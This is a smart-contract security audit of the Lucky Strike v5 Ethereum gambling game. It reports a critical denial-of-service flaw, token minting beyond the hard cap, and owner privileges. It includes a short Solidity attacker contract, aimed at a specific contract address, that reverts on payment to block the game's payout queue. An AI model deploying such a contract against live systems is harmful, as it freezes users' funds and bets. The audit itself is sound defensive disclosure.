This is the report from a security audit performed on Lucky Strike v5 by gorbunovperm.
Lucky Strike, based fully in Ethereum smart-contract, is bringing the core philosophy of blockchain to the gambling industry – enhancing it with an ICO model we’re calling ‘Bet & Own.’
https://lucky-strike.io/game/#/
In total, 4 issues were reported including:
-
1 critical severity issue.
-
0 high severity issue.
-
0 medium severity issues.
-
1 low severity issues.
-
1 owner privileges.
-
1 note.
In current version the draw takes place by quenue and each bet is played out one by one. In case of victory, the winner is paid a reward by transfer
function. The peculiarity of this function is that in the case of throw
on the recipient's side the entire transaction will be rollbacked. throw
can be done intentionally by an attacker, if the recipient is another smart contract. Thus, the attacker can block the entire contract, making it impossible to place bets and draws.
Simple example of an Attackers contract:
contract Attacker {
LuckyStrike public ls = LuckyStrike(address(0x1A77110391C07D3d67c8c55C6114A858cB45BB26));
bool public blockMode = true;
function turnBlockModeOn() public {
blockMode = true;
}
function turnBlockModeOff() public {
blockMode = false;
}
function () payable external {
if(blockMode) {
revert(); // LuckyStrike blocked;
}
}
function bet() public payable {
ls.placeABet.value(msg.value)();
}
}
-
It is possible to double withdrawal attack. More details here
-
Lack of transaction handling mechanism issue. WARNING! This is a very common issue and it already caused millions of dollars losses for lots of token users! More details here
Function mint
allows owner to mint more tokens than hardCap
.
You should check (invested + _invested) > hardCap
before minting and if it's true, mint only hardCap - invested
number of tokens and return remainder to investor.
adjustAllocation
function allows the owner to reset the rates of the different jackpots and income rate.
There is one serious vulnerability that should be fixed.